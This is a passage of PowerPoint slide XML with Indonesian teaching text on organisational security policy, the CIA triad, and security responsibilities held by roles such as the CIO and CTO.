            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara-cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> triad CIA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekolah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>firma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuntansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>multinasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, masing-masing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekonomi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manapun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maupun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepentingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>datanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyadari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Struktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hirarki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran-peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Chief Information Officer (CIO). Peran </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Chief Technology Officer (CTO), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI yang </a:t>
            </a:r>
            <a:r>
